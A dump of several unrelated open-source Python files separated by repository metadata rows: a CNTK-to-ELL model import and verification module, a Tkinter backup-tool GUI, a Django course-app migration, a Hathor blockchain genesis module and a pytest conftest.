    elif len(original_shape) == 2:
        # (channel, row) -> (row, 1, channel)
        ordered_weights = np.moveaxis(ordered_weights, 0, -1)
        ordered_weights = ordered_weights.ravel().astype(
            np.float64).reshape(original_shape[1], 1, original_shape[0])
    elif len(original_shape) == 1:
        # Flat vector -> (1, 1, n)
        ordered_weights = ordered_weights.ravel().astype(
            np.float64).reshape(1, 1, cntk_node_results.size)
    else:
        raise NotImplementedError(
            "Unsupported tensor dimensions {}".format(len(original_shape)))
    return ordered_weights
def print_comparison(tensorA, tensorB):
    """Print every position where two (row, column, channel) tensors differ
    by more than 1e-4.  Debugging aid; returns None.

    Fix: removed a stray leading ``pass`` statement (leftover from
    stubbing the function out) that served no purpose.
    """
    for row in range(tensorA.shape[0]):
        for column in range(tensorA.shape[1]):
            for channel in range(tensorA.shape[2]):
                if math.fabs(tensorA[row, column, channel] - tensorB[row, column, channel]) > 0.0001:
                    print("A[{},{},{}] = {}".format(row, column, channel, tensorA[row, column, channel]))
                    print("B[{},{},{}] = {}".format(row, column, channel, tensorB[row, column, channel]))
def verify_ell_nodes_in_vision_model(ell_map, cntk_model, cntk_nodes, ordered_importer_nodes, node_mapping,
                                     testing_info):
    """Compare each converted ELL node's output against the matching CNTK node.

    Feeds one random input image through both the ELL map and per-node CNTK
    clones, then asserts the (normalized) outputs agree to ~1e-4.  Sets
    testing_info["apply_softmax"] when a Softmax node is encountered so the
    caller can mirror it.  Raises on the first mismatch or eval failure.
    """
    _logger = logger.get()
    _logger.info("\n\nVerification of model nodes starting")
    cntk_node_results = None
    try:
        # Get input to the CNTK model
        cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
        ell_input_tensor = cntk_input_tensor
        if len(cntk_model.arguments[0].shape) == 1:
            ell_input_tensor = cntk_input_tensor.reshape((1, 1, cntk_model.arguments[0].shape[0]))
        ell_input_tensor = memory_shapes.get_tensor_in_ell_order(ell_input_tensor, "channel_row_column")
        ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
        # For convenient lookup, map from the cntk intermediate node to the
        # importer node
        cntk_nodes_map = {}
        for cntk_node in cntk_nodes:
            cntk_nodes_map[cntk_node.uid] = cntk_node
        # Feed input to the ELL model
        _logger.info("Getting computed ELL results")
        ell_map.Compute(ell_input_tensor)
        # Walk list of importer nodes
        for importer_node in ordered_importer_nodes:
            # These operation types produce no comparable tensor of their own.
            if importer_node.operation_type in ["Input", "Passthrough", "Reshape", "Skip", "Softmax"]:
                if importer_node.operation_type == "Softmax":
                    testing_info["apply_softmax"] = True
                continue
            _logger.info("Looking at node: {}".format(importer_node))
            # Get the CNTK output values
            cntk_node = cntk_nodes_map[importer_node.id]
            try:
                if cntk_node.op_name != "UserFunction":
                    clone = cntk_node.clone(CloneMethod.clone)
            except BaseException:
                _logger.info("Couldn't clone {}, skipping".format(cntk_node.uid))
                continue
            # Get output from CNTK model
            _logger.info("Getting CNTK results")
            if (len(clone.arguments) > 1):
                # Second argument (e.g. labels) is fed zeros just to satisfy eval.
                arg1_output = np.zeros(clone.arguments[1].shape).astype(np.float32)
                cntk_node_results = clone.eval({clone.arguments[0]: [cntk_input_tensor],
                                                clone.arguments[1]: arg1_output})
            else:
                cntk_node_results = clone.eval({clone.arguments[0]: [cntk_input_tensor]})
            # Reorder cntk node output
            cntk_node_results = get_node_output_in_ell_order(cntk_node_results)
            # Get the results from the last ELL node for that group
            ell_node = node_mapping[importer_node.id][-1]
            ell_node_output_port = ell_node.GetOutputPort("output")
            ell_node_results = np.zeros((ell_node_output_port.Size(),), dtype=np.float32)
            for i in range(ell_node_output_port.Size()):
                ell_node_results[i] = ell_node_output_port.GetDoubleOutput(i)
            output_shape = cntk_node_results.shape
            if (len(output_shape) == 3):
                # ELL output includes padding rows/columns; reshape then crop
                # down to the active (unpadded) region for comparison.
                padding = importer_node.output_padding["size"]
                output_shape_with_padding = (output_shape[0] + 2 * padding,
                                             output_shape[1] + 2 * padding,
                                             output_shape[2])
                ell_node_results = ell_node_results.reshape(output_shape_with_padding)
                # Remove padding and look at active region only
                ell_node_results = ell_node_results[padding:output_shape[0] + padding,
                                                    padding:output_shape[1] + padding, :]
            # Compare results. Some layers have large numbers (e.g > 500.734) and some small numbers
            # (e.g. 0.0038453). To make the comparison more resilient and meaningful for large numbers,
            # normalize before comparing, since comparison is being done on significant digits.
            max = cntk_node_results.max()
            if max > 100:
                cntk_node_results = cntk_node_results / max
                ell_node_results = ell_node_results / max
            np.testing.assert_allclose(
                cntk_node_results, ell_node_results, rtol=1e-04, atol=1e-04, err_msg=(
                    'results for compiled ELL model do not match CNTK output!'))
            _logger.info("Output for {} verified\n".format(importer_node.id))
    except BaseException as exception:
        _logger.error("Verification of model output failed")
        # if cntk_node_results is not None:
        #     print_comparison(cntk_node_results, ell_node_results)
        raise exception
    _logger.info("Verification of model nodes complete\n")
def get_output_from_cntk_model(cntk_model, cntk_input_tensor, testing_info):
    """Evaluate ``cntk_model`` on one input and return the output in ELL order.

    If the model has multiple outputs, the one with the largest dimension
    is selected.  When testing_info["apply_softmax"] is set, softmax is
    applied to mirror a Softmax node dropped during import.
    """
    # Get output from CNTK model
    _logger = logger.get()
    _logger.info("Getting CNTK results")
    if (len(cntk_model.arguments) > 1):
        # Second argument (e.g. labels) is fed zeros just to satisfy eval.
        arg1_output = np.zeros(cntk_model.arguments[1].shape).astype(np.float32)
        cntk_output = cntk_model.eval({cntk_model.arguments[0]: [cntk_input_tensor],
                                       cntk_model.arguments[1]: arg1_output})
    else:
        cntk_output = cntk_model.eval({cntk_model.arguments[0]: [cntk_input_tensor]})
    size = 0
    if isinstance(cntk_output, dict):
        # Multiple outputs: keep the output whose largest dimension is biggest.
        for key in cntk_model.outputs:
            shape = key.shape
            if len(shape) > 0:
                s = np.max(shape)
                if (s > size):
                    size = s
                    cntk_output = cntk_output[key][0]
    else:
        # Single output: drop the batch dimension.
        cntk_output = cntk_output[0]
    # Check whether softmax needs to be applied or not.
    if testing_info["apply_softmax"]:
        cntk_output = softmax(cntk_output).eval()
    # Reorder cntk node output
    cntk_output = get_node_output_in_ell_order(cntk_output)
    return cntk_output
def verify_ell_output_in_vision_model(ell_map, cntk_model, testing_info):
    """Verify whole-model agreement between CNTK, computed ELL and compiled ELL.

    Runs one random input through all three paths, asserts pairwise
    agreement to 4 decimals, then reports average compiled inference time
    over 50 random frames.  Raises on any mismatch.
    """
    _logger = logger.get()
    _logger.info("Verification of model output starting")
    try:
        cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
        ell_input_tensor = memory_shapes.get_tensor_in_ell_order(cntk_input_tensor, "channel_row_column")
        ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
        # Get output from CNTK model
        cntk_output = get_output_from_cntk_model(cntk_model, cntk_input_tensor, testing_info)
        # Get computed ELL result
        _logger.info("Getting computed ELL results")
        result_from_compute = np.array(ell_map.Compute(ell_input_tensor))
        # Get compiled ELL result
        _logger.info("Getting compiled ELL results")
        compiler_options = ell.model.MapCompilerOptions()
        compiler_options.useBlas = True
        compiled_ell_map = ell_map.Compile("host", "model", "predict", compilerOptions=compiler_options)
        result_from_compiled = np.array(compiled_ell_map.Compute(ell_input_tensor))
        # Verify the computed result against the cntk result
        np.testing.assert_array_almost_equal(
            cntk_output, result_from_compute, decimal=4,
            err_msg=('results for computed ELL model do not match CNTK output!'))
        _logger.info("Verified computed result against CNTK")
        # Verify the compiled result against the cntk result
        np.testing.assert_array_almost_equal(
            cntk_output, result_from_compiled, decimal=4, err_msg=(
                'results for compiled ELL model do not match CNTK output!'))
        _logger.info("Verified compiled result against CNTK")
        # Verify the compiled result agrees with the computed result
        np.testing.assert_array_almost_equal(
            result_from_compute, result_from_compiled, decimal=4, err_msg=(
                'results for computed ELL model do not match results from compiled ELL model!'))
        _logger.info("Verified compiled result against computed result")
        # Get timing info
        total_time = 0
        num_frames = 50
        _logger.info("Sending {} frames through model...".format(num_frames))
        for i in range(num_frames):
            cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
            ell_input_tensor = memory_shapes.get_tensor_in_ell_order(cntk_input_tensor, "channel_row_column")
            ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
            start = time.time()
            result_from_compiled = np.array(compiled_ell_map.Compute(ell_input_tensor, dtype=np.float32))
            end = time.time()
            total_time += end - start
        total_time /= num_frames
        _logger.info("Average speed: {:.0f}ms/frame".format(total_time * 1000))
    except BaseException as exception:
        _logger.error("Verification of model output failed")
        raise exception
    _logger.info("Verification of model output complete")
def verify_compiled_ell_nodes_in_vision_model(modelFile, cntk_model, model_cntk_nodes, ordered_importer_nodes,
                                              step_interval_msec=None, lag_threshold_msec=None, plot_model=False,
                                              verify_model={"audio": False, "vision": False}):
    """Incrementally verify compiled ELL output for growing prefixes of the model.

    For each prefix of 2..N CNTK nodes, an ELL map is built, compiled and
    compared against the CNTK clone of the prefix's last node on one random
    input.  On mismatch the partial map is saved next to ``modelFile`` and
    the exception re-raised.  Only vision models are verified.
    NOTE(review): ``verify_model`` uses a mutable dict default; it is only
    read here, so this is benign, but callers should still pass their own.
    """
    _logger = logger.get()
    # For convenient lookup, map from the cntk intermediate node to the
    # importer node
    cntk_nodes_map = {}
    for cntk_node in model_cntk_nodes:
        cntk_nodes_map[cntk_node.uid] = cntk_node
    cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
    ell_input_tensor = cntk_input_tensor
    if len(cntk_model.arguments[0].shape) == 1:
        ell_input_tensor = cntk_input_tensor.reshape((1, 1, cntk_model.arguments[0].shape[0]))
    ell_input_tensor = memory_shapes.get_tensor_in_ell_order(ell_input_tensor, "channel_row_column")
    ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
    cntk_nodes = [cntk_nodes_map[ordered_importer_nodes[0].id]]
    for i in range(1, len(ordered_importer_nodes)):
        cntk_node = cntk_nodes_map[ordered_importer_nodes[i].id]
        cntk_nodes.append(cntk_node)
        try:
            _logger.info("---- Testing compiled ELL nodes using prefix of {} CNTK nodes ----".format(i + 1))
            _logger.info("Last CNTK node in chain: {}".format(cntk_nodes[i].uid))
            # Create an ImporterModel from the CNTK nodes
            importer_model = import_nodes(cntk_nodes)
            if len(importer_model.nodes) > 0:
                # Use the common importer engine to drive conversion of the
                # ImporterModel to ELL layers
                importer_engine = common.importer.ImporterEngine(step_interval_msec=step_interval_msec,
                                                                 lag_threshold_msec=lag_threshold_msec)
                ell_map = importer_engine.convert_nodes(importer_model)
                prefix_ordered_importer_nodes, _ = importer_engine.get_importer_node_to_ell_mapping()
                # If the prefix's last converted node isn't the node under test
                # (e.g. it was fused or skipped), defer testing to a later prefix.
                if prefix_ordered_importer_nodes[-1].id != ordered_importer_nodes[i].id:
                    _logger.info("Skipping..., can't test output of node {} yet".format(ordered_importer_nodes[i].id))
                    continue
            else:
                _logger.info("Skipping...")
                continue
            # Feed input to the ELL model
            _logger.info("Getting computed ELL results")
            ell_map.Compute(ell_input_tensor)
            model_clone = None
            if cntk_node.op_name != "UserFunction":
                model_clone = cntk_node.clone(CloneMethod.clone)
            if not model_clone:
                print("Skipping...")
                continue
            if verify_model["audio"]:
                _logger.info("Verification of audio models is not supported at this time, skipping verification")
            elif verify_model["vision"]:
                testing_info = {"apply_softmax": False}
                try:
                    # Get output from CNTK model
                    cntk_output = get_output_from_cntk_model(model_clone, cntk_input_tensor, testing_info)
                    # Get compiled ELL result
                    _logger.info("Getting compiled ELL results")
                    compiler_options = ell.model.MapCompilerOptions()
                    compiler_options.useBlas = True
                    compiled_ell_map = ell_map.Compile("host", "model", "predict", compilerOptions=compiler_options)
                    result_from_compiled = np.array(compiled_ell_map.Compute(ell_input_tensor))
                    output_shape = cntk_output.shape
                    if (len(output_shape) == 3):
                        if cntk_output.size == result_from_compiled.size:
                            result_from_compiled = result_from_compiled.reshape(output_shape)
                        else:
                            # Sizes differ: ELL output still carries padding;
                            # reshape with padding, then crop the active region.
                            padding = ordered_importer_nodes[i].output_padding["size"]
                            output_shape_with_padding = (output_shape[0] + 2 * padding,
                                                         output_shape[1] + 2 * padding,
                                                         output_shape[2])
                            result_from_compiled = result_from_compiled.reshape(output_shape_with_padding)
                            # Remove padding and look at active region only
                            result_from_compiled = result_from_compiled[padding:output_shape[0] + padding,
                                                                        padding:output_shape[1] + padding, :]
                    # Put the ELL results into same order as CNTK
                    # if prefix_ordered_importer_nodes[-1].output_shapes[0][1] == "channel_row_column":
                    print(result_from_compiled.shape, cntk_output.shape)
                    # result_from_compiled = memory_shapes.get_tensor_in_ell_order(result_from_compiled, "xyz")
                    # print(result_from_compiled)
                    # print(cntk_output)
                    # Compare results. Some layers have large numbers (e.g > 500.734) and some small numbers
                    # (e.g. 0.0038453). To make the comparison more resilient and meaningful for large numbers,
                    # normalize before comparing, since comparison is being done on significant digits.
                    max = cntk_output.max()
                    if max > 100:
                        cntk_output = cntk_output / max
                        result_from_compiled = result_from_compiled / max
                    # Verify the compiled result against the cntk result
                    np.testing.assert_array_almost_equal(
                        cntk_output, result_from_compiled, decimal=4, err_msg=(
                            'results for compiled ELL nodes do not match CNTK output!'))
                    _logger.info("---- passed ----")
                    _logger.info("")
                except BaseException as exception:
                    _logger.error("Error occurred verifying compiled ELL nodes of imported model")
                    # Save the failing partial map next to the source model for debugging.
                    basename, ext = os.path.splitext(modelFile)
                    ell_map.Save(basename + ".ell.compiled_node_verification_failed")
                    raise exception
        except BaseException as exception:
            _logger.error("Error occurred attempting to convert cntk layers to ELL model: " + str(exception))
            raise exception
def map_from_cntk_model_using_new_engine(modelFile, step_interval_msec=None, lag_threshold_msec=None, plot_model=False,
                                         verify_model={"audio": False, "vision": False}):
    """
    Loads a CNTK model and returns an ell.model.Map

    Optionally plots the CNTK graph and, for vision models, verifies the
    converted map against CNTK (saving the failing map to
    ``<model>.ell.verification_failed`` on mismatch).
    NOTE(review): ``verify_model`` uses a mutable dict default; it is only
    read here, so this is benign, but callers should still pass their own.
    """
    _logger = logger.get()
    _logger.info("Loading...")
    cntk_model = load_model(modelFile)
    _logger.info("\nFinished loading.")
    if plot_model:
        filename = os.path.join(os.path.dirname(modelFile), os.path.basename(modelFile) + ".svg")
        cntk_utilities.plot_model(cntk_model, filename)
    try:
        _logger.info("Pre-processing...")
        # Get the relevant nodes from CNTK that make up the model
        cntk_nodes = cntk_utilities.Utilities.get_model_nodes(cntk_model)
        _logger.info("\nFinished pre-processing.")
        # Create an ImporterModel from the CNTK nodes
        importer_model = import_nodes(cntk_nodes)
        # Use the common importer engine to drive conversion of the
        # ImporterModel to ELL layers
        importer_engine = common.importer.ImporterEngine(step_interval_msec=step_interval_msec,
                                                         lag_threshold_msec=lag_threshold_msec)
        ell_map = importer_engine.convert_nodes(importer_model)
    except BaseException as exception:
        _logger.error("Error occurred attempting to convert cntk layers to ELL model: " + str(exception))
        raise exception
    if verify_model["audio"]:
        _logger.info("Verification of audio models is not supported at this time, skipping verification")
    elif verify_model["vision"]:
        testing_info = {"apply_softmax": False}
        try:
            ordered_importer_nodes, node_mapping = importer_engine.get_importer_node_to_ell_mapping()
            # RESTORE:
            # verify_ell_nodes_in_vision_model(ell_map, cntk_model, cntk_nodes, ordered_importer_nodes, node_mapping,
            #                                  testing_info)
            verify_compiled_ell_nodes_in_vision_model(modelFile, cntk_model, cntk_nodes, ordered_importer_nodes,
                                                      verify_model=verify_model)
            verify_ell_output_in_vision_model(ell_map, cntk_model, testing_info)
        except BaseException as exception:
            _logger.error("Error occurred verifying imported model")
            # Save the failing map next to the source model for debugging.
            basename, ext = os.path.splitext(modelFile)
            ell_map.Save(basename + ".ell.verification_failed")
            raise exception
    return ell_map
| 46.881533 | 119 | 0.634262 |
54d76c5c3aee421d915ca9ca85c36ac4c92909e8 | 3,137 | py | Python | Outros/Advanced Backup v.0.1 alpha/Application/interface.py | paulovrn12/Aprendizados | fab59169e81d3f86709206dccbee69a69cf29964 | [
"MIT"
] | null | null | null | Outros/Advanced Backup v.0.1 alpha/Application/interface.py | paulovrn12/Aprendizados | fab59169e81d3f86709206dccbee69a69cf29964 | [
"MIT"
] | null | null | null | Outros/Advanced Backup v.0.1 alpha/Application/interface.py | paulovrn12/Aprendizados | fab59169e81d3f86709206dccbee69a69cf29964 | [
"MIT"
] | null | null | null | # IMPORTAÇÕES
from tkinter import *
import robocopy as rc
def TelaInicio():
    """Show the start screen with the four backup-mode buttons.

    Blocks in Tk's mainloop until the window is closed.  Only the
    Robocopy button currently has a command wired up.
    """
    # Useful variables
    icon_dir = r'Scripts\Advanced Backup v.0.1 alpha\Application\data\icon\adv.ico'
    # GUI window setup (fixed 400x180, centered via CentroMonitor)
    tela = Tk()
    tela.title('Início - Advanced Backup v.0.1 alpha')
    CentroMonitor(tela, 400, 180)
    tela.iconbitmap(icon_dir)
    tela.resizable(False, False)
    # Widgets (button labels are user-facing Portuguese text)
    orient_tx = Label(tela, text='Selecione abaixo a opção de Backup desejada!', width=53)
    copy_paste_bt = Button(tela, text='Copiar e Colar\n(Simples)')
    robocopy_bt = Button(tela, text='Backup Robocopy\n(Avançado)', command=TelaRobocopy)
    cloud_bt = Button(tela, text='Backup Externo\n(Cloud / Nuvem)')
    github_bt = Button(tela, text='Backup de Código\n(Git / GitHub)')
    # Layout: 2x2 grid of buttons under the instruction label
    orient_tx.grid(sticky='we', columnspan=2, padx=10, pady=10)
    copy_paste_bt.grid(sticky='we', row=1, column=0, padx=10, pady=10)
    robocopy_bt.grid(sticky='we', row=1, column=1, padx=10, pady=10)
    cloud_bt.grid(sticky='we', row=2, column=0, padx=10, pady=10)
    github_bt.grid(sticky='we', row=2, column=1, padx=10, pady=10)
    # Enter the Tk event loop
    tela.mainloop()
def TelaRobocopy(ultimo_backup='Sem histórico!'):
    """Show the Robocopy backup screen.

    :param ultimo_backup: text of the last backup directory, or the
        sentinel 'Sem histórico!' ("no history") when none exists.
    Blocks in Tk's mainloop until the window is closed.
    """
    # Helper functions
    def CorDiretorio(label):
        # Color the last-backup label red when there is no history,
        # green otherwise.
        if ultimo_backup == 'Sem histórico!':
            label['fg'] = '#ff0000'
            return label['fg']
        else:
            label['fg'] = '#00ff00'
            return label['fg']
    #def BotaoRepetirBackup():
    #    if ultimo_backup == 'Sem histórico!':
    #
    #        return
    #    else:
    #
    #        return
    # Useful variables
    icone_dir = r'Scripts\Advanced Backup v.0.1 alpha\Application\data\icon\adv.ico'
    # GUI window setup (fixed 400x180, centered via CentroMonitor)
    tela = Tk()
    tela.title('Robocopy - Advanced Backup v.0.1 alpha')
    CentroMonitor(tela, 400, 180)
    tela.iconbitmap(icone_dir)
    tela.resizable(False, False)
    # Widgets (labels/buttons carry user-facing Portuguese text)
    texto_opcao = Label(tela, text='Você selecionou a opção Backup Robocopy')
    texto_ajuda = Label(tela, text='Nessa opção é possível realizar um backup dos seus arquivos com o\ndetalhamento completo de tudo o que foi feito no processo.', justify=LEFT)
    texto_historico = Label(tela, text=f'Ultimo backup:', justify=LEFT)
    texto_diretorio = Label(tela, text=f'{ultimo_backup}', justify=LEFT, anchor=W, fg='#000000')
    CorDiretorio(texto_diretorio)
    botao_rep_backup = Button(tela, text='Repetir os diretórios do\nultimo backup realizado', justify=CENTER, width=22)
    botao_selec_dir = Button(tela, text='Selecionar diretórios de orígem\ne destino do seu backup', justify=CENTER)
    # Layout: help text on top, history row, then the two action buttons
    texto_opcao.grid(row=0, column=0, columnspan=4, sticky='we', padx=10, pady=10)
    texto_ajuda.grid(row=1, column=0, rowspan=2, columnspan=4, sticky=W, padx=10)
    texto_historico.grid(row=3, column=0, columnspan=3, sticky=W, padx=10)
    texto_diretorio.grid(row=3, column=1, sticky=E, padx=10)
    botao_rep_backup.grid(row=4, column=0, rowspan=2, columnspan=4, sticky=W,padx=10, pady=10)
    botao_selec_dir.grid(row=4, column=2, rowspan=2, columnspan=4, sticky=E,padx=10, pady=10)
    # Enter the Tk event loop
    tela.mainloop()
| 41.826667 | 177 | 0.669748 |
f82da76e6a951eb3963c0e9ec99ce38bb451cb03 | 5,115 | py | Python | onlinecourse/migrations/0001_initial.py | jtihomirovs/final-cloud-app-with-database | b850cf743c98dceac77abdc43de40df40c52bb0c | [
"Apache-2.0"
] | null | null | null | onlinecourse/migrations/0001_initial.py | jtihomirovs/final-cloud-app-with-database | b850cf743c98dceac77abdc43de40df40c52bb0c | [
"Apache-2.0"
] | null | null | null | onlinecourse/migrations/0001_initial.py | jtihomirovs/final-cloud-app-with-database | b850cf743c98dceac77abdc43de40df40c52bb0c | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.3 on 2022-01-13 10:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial schema for the online-course app.

    Auto-generated by Django 3.1.3 — do not edit model definitions by
    hand; create a follow-up migration instead.
    """

    # First migration of this app.
    initial = True

    # Requires the project's swappable user model to exist.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Answer choices for questions (question FK added at the end).
        migrations.CreateModel(
            name='Choice',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('choice_text', models.TextField()),
                ('is_choice_correct', models.BooleanField()),
            ],
        ),
        migrations.CreateModel(
            name='Course',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(default='online course', max_length=30)),
                ('image', models.ImageField(upload_to='course_images/')),
                ('description', models.CharField(max_length=1000)),
                ('pub_date', models.DateField(null=True)),
                ('total_enrollment', models.IntegerField(default=0)),
            ],
        ),
        # Through-model linking users to courses.
        migrations.CreateModel(
            name='Enrollment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_enrolled', models.DateField(default=django.utils.timezone.now)),
                ('mode', models.CharField(choices=[('audit', 'Audit'), ('honor', 'Honor'), ('BETA', 'BETA')], default='audit', max_length=5)),
                ('rating', models.FloatField(default=5.0)),
                ('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Submission',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('choices', models.ManyToManyField(to='onlinecourse.Choice')),
                ('enrollment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.enrollment')),
            ],
        ),
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question_text', models.TextField()),
                ('grade_point', models.FloatField(default=5.0)),
                ('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course')),
            ],
        ),
        migrations.CreateModel(
            name='Lesson',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(default='title', max_length=200)),
                ('order', models.IntegerField(default=0)),
                ('content', models.TextField()),
                ('course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course')),
            ],
        ),
        # Profile models wrapping the auth user.
        migrations.CreateModel(
            name='Learner',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('occupation', models.CharField(choices=[('student', 'Student'), ('developer', 'Developer'), ('data_scientist', 'Data Scientist'), ('dba', 'Database Admin')], default='student', max_length=20)),
                ('social_link', models.URLField()),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Instructor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('full_time', models.BooleanField(default=True)),
                ('total_learners', models.IntegerField()),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # M2M fields added after both endpoint models exist.
        migrations.AddField(
            model_name='course',
            name='instructors',
            field=models.ManyToManyField(to='onlinecourse.Instructor'),
        ),
        migrations.AddField(
            model_name='course',
            name='users',
            field=models.ManyToManyField(through='onlinecourse.Enrollment', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='choice',
            name='question',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.question'),
        ),
    ]
| 46.926606 | 210 | 0.583187 |
851e4db9136a44b5000b9f70486fa0f6e1bc1bc8 | 2,464 | py | Python | hathor/transaction/genesis.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 51 | 2019-12-28T03:33:27.000Z | 2022-03-10T14:03:03.000Z | hathor/transaction/genesis.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 316 | 2019-09-10T09:20:05.000Z | 2022-03-31T20:18:56.000Z | hathor/transaction/genesis.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | 19 | 2020-01-04T00:13:18.000Z | 2022-02-08T21:18:46.000Z | # Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING, List, Optional
from hathor.conf import HathorSettings
from hathor.transaction import BaseTransaction, Block, Transaction, TxOutput
if TYPE_CHECKING:
from hathor.transaction.storage import TransactionStorage # noqa: F401
settings = HathorSettings()

# The three hard-coded genesis vertices of the chain: one block plus two
# transactions.  All parameters come from the active HathorSettings.
BLOCK_GENESIS = Block(
    hash=settings.GENESIS_BLOCK_HASH,
    nonce=settings.GENESIS_BLOCK_NONCE,
    timestamp=settings.GENESIS_TIMESTAMP,
    weight=settings.MIN_BLOCK_WEIGHT,
    outputs=[
        TxOutput(settings.GENESIS_TOKENS, settings.GENESIS_OUTPUT_SCRIPT),
    ],
)
TX_GENESIS1 = Transaction(
    hash=settings.GENESIS_TX1_HASH,
    nonce=settings.GENESIS_TX1_NONCE,
    timestamp=settings.GENESIS_TIMESTAMP + 1,
    weight=settings.MIN_TX_WEIGHT,
)
TX_GENESIS2 = Transaction(
    hash=settings.GENESIS_TX2_HASH,
    nonce=settings.GENESIS_TX2_NONCE,
    timestamp=settings.GENESIS_TIMESTAMP + 2,
    weight=settings.MIN_TX_WEIGHT,
)
# Canonical order: block first, then the two transactions.
GENESIS = [BLOCK_GENESIS, TX_GENESIS1, TX_GENESIS2]
GENESIS_HASHES = [settings.GENESIS_BLOCK_HASH, settings.GENESIS_TX1_HASH, settings.GENESIS_TX2_HASH]
def _get_genesis_hash() -> bytes:
    """Return a SHA256 digest folding in the hashes of all genesis vertices."""
    import hashlib
    hasher = hashlib.sha256()
    for vertex in GENESIS:
        vertex_hash = vertex.hash
        assert vertex_hash is not None
        hasher.update(vertex_hash)
    return hasher.digest()
def _get_genesis_transactions_unsafe(tx_storage: Optional['TransactionStorage']) -> List[BaseTransaction]:
    """You shouldn't get genesis directly. Please, get it from your storage instead.

    Returns fresh clones of the genesis vertices, each bound to `tx_storage`.
    """
    clones = []
    for template in GENESIS:
        clone = template.clone()
        clone.storage = tx_storage
        clones.append(clone)
    return clones
def is_genesis(hash_bytes: bytes) -> bool:
    """Check whether hash is from a genesis transaction."""
    return any(hash_bytes == tx.hash for tx in GENESIS)
| 29.686747 | 106 | 0.737013 |
9df791e491b8a3300aa5b5aed8ec37448d86d231 | 1,183 | py | Python | tests/conftest.py | rsokl/noggin | 154e4fffa3298eb1f65e1720712b21264733a7cd | [
"MIT"
] | 25 | 2019-05-28T13:59:43.000Z | 2021-08-20T00:08:10.000Z | tests/conftest.py | rsokl/noggin | 154e4fffa3298eb1f65e1720712b21264733a7cd | [
"MIT"
] | 23 | 2019-05-30T14:51:58.000Z | 2020-04-17T15:53:20.000Z | tests/conftest.py | rsokl/noggin | 154e4fffa3298eb1f65e1720712b21264733a7cd | [
"MIT"
] | 1 | 2020-04-17T15:54:52.000Z | 2020-04-17T15:54:52.000Z | import os
import tempfile
import matplotlib.pyplot as plt
import pytest
from hypothesis import Verbosity, settings
# Hypothesis test profiles; select one at run time via the
# HYPOTHESIS_PROFILE environment variable (falls back to "default").
settings.register_profile("ci", deadline=None)
settings.register_profile("intense", deadline=None, max_examples=1000)
settings.register_profile("dev", max_examples=10)
settings.register_profile("debug", max_examples=10, verbosity=Verbosity.verbose)
settings.load_profile(os.getenv("HYPOTHESIS_PROFILE", "default"))
@pytest.fixture()
def cleandir() -> str:
    """Run the test from inside a disposable temporary directory.

    The working directory is switched to a fresh tmp-dir for the
    duration of the test; afterwards the previous working directory is
    restored and the tmp-dir with all of its contents is removed.

    Yields
    ------
    str
        The name of the temporary directory.
    """
    previous_cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as scratch_dir:
        os.chdir(scratch_dir)
        yield scratch_dir
        os.chdir(previous_cwd)
@pytest.fixture(scope="session", autouse=True)
def killplots():
    """Close every open matplotlib figure once the test session finishes."""
    yield
    plt.close("all")
